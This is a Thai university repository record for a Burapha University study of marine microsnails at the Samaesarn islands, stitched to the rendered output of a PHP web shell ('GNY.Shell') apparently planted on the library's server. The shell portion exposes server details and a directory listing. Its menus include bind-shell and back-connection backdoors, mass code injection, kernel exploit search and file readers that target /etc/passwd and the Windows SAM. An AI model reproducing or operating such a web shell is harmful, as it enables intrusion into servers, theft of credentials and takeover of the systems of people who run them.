หอยทะเลจิ๋วในพื้นที่ปกปักพันธุกรรมพืชทางทะเล หมู่เกาะแสมสาร จังหวัดชลบุรี.

Titleหอยทะเลจิ๋วในพื้นที่ปกปักพันธุกรรมพืชทางทะเล หมู่เกาะแสมสาร จังหวัดชลบุรี.
Publication TypeResearch
Year of Publication2554
Authorsพงษ์รัตน์ ดำรงโรจน์วัฒนา., Pongrat Dumrangrojwattana.
Corporate Authorsคณะวิทยาศาสตร์., Faculty of Science.
Institutionมหาวิทยาลัยบูรพา. (Burapha University).
Cityชลบุรี. (Chonburi).
Typeงานวิจัย.
Keywordsสาขาเกษตรศาสตร์และชีววิทยา., หมู่เกาะแสมสาร., หอย - - ไทย (ภาคตะวันออก).
Abstractจากการสุ่มเก็บตัวอย่างหอยจิ๋วทะเล (Marine Microsnails) จากตะกอนทราย บริเวณหมู่เกาะแสมสาร จังหวัดชลบุรี จำนวน 7 สถานี ได้แก่ หาดลูกลม หาดเทียน หาดหน้าบ้าน หาดกรวด หาดเตย เกาะปลาหมึกและบริเวณใต้เรือจม พบหอยทะเลจิ๋วจำนวนทั้งสิ้น 1 ชั้นย่อย (subclass) 3 อันดับ (orders), 21 วงศ์ (families), 53 สกุล (genera) และ 144 ชนิด (species) โดยจัดจำแนกได้ถึงระดับชนิด จำนวน 58 ชนิด และระดับสกุลจำนวน 86 ชนิด สำรวจพบหอยทะเลจิ๋วในวงศ์ Triphoridae มีความหลากหลายชนิดมากที่สุดคือ 46 ชนิด รองลงมาได้แก่หอยทะเลจิ๋วในวงศ์ Pyramidellidae จำนวน 12 ชนิดในแต่ละวงศ์ตามลำดับชนิด การกระจายของหอยทะเลจิ๋วบริเวณเกาะแสมสาร พบความหลากชนิดมากที่สุดที่บริเวณหาดกรวด พบจำนวน 72 ชนิด รองลงมาได้แก่บริเวณ เกาะปลาหมึก พบจำนวน 57 ชนิด ส่วนบริเวณหาดลูกลม หาดเทียน หาดหน้าบ้าน หาดเตย และบริเวณใต้เรือจม พบหอยทะเลจิ๋วจำนวน 34,32,18,28 และ 20 ชนิดตามลำดับ ในจำนวนหอยทะเลจิ๋วที่สำรวจพบทั้งหมด มีจำนวนชนิดไม่น้อยกว่า 120 ชนิด ที่เป็นการรายงานถึงการพบกันครั้งแรกในบริเวณอ่าวไทย Marine microsnails on Samaesarn Island, Chonburi Province have been investigated. Specimens were collected from sand grit in seven stations; Hard Luklom, Hard Tean, Hard Naban, Hard Gruad, Hard Tuay, Koh PlaPlamuk and Ruechom. 1 subclass, 3 orders, 21 families, 53 genera and 144 species were recorded. Among these, only 58 sample can indentified in species level while the other can indentified into generic level. The most species diversity belong to microsnails family Triphoridae, 46 species recorded. The second diverse family belong to Pyramidellidae, 17 species. Cerithiidae and Cerithiopsidae are the third diverse family, 12 species. Hard Guad found most diverse diversity, 71 species, followed by Koh Plamuk, 57 species. The microsnail diversity recorded form Hard Luklom, Hard Tean , Hard Naban, Hard Tuay and Ruechom were 34,32,18,28 and 20 species respectively. From the total, at least 120 species were new recorded of marine microsnail species in the Gulf of Thailand.
Research Notesโครงการวิจัยงบประมาณเงินรายได้ (เงินอุดหนุนรัฐบาล) มหาวิทยาลัยบูรพา ประจำปีงบประมาณ 2554
Alternate TitleMarine microsnails along the marine ecosystem in the marine plant genetic conservation area, Mo Ko Samaesarn, Chon Buri Province.
GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 266.73 GB of 389.83 GB (68.42%)Server IP: 10.32.1.15 - Your IP: 54.87.101.216

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 24.01.2015 12:35:08 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 24.01.2015 12:55:44 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0411 ]:.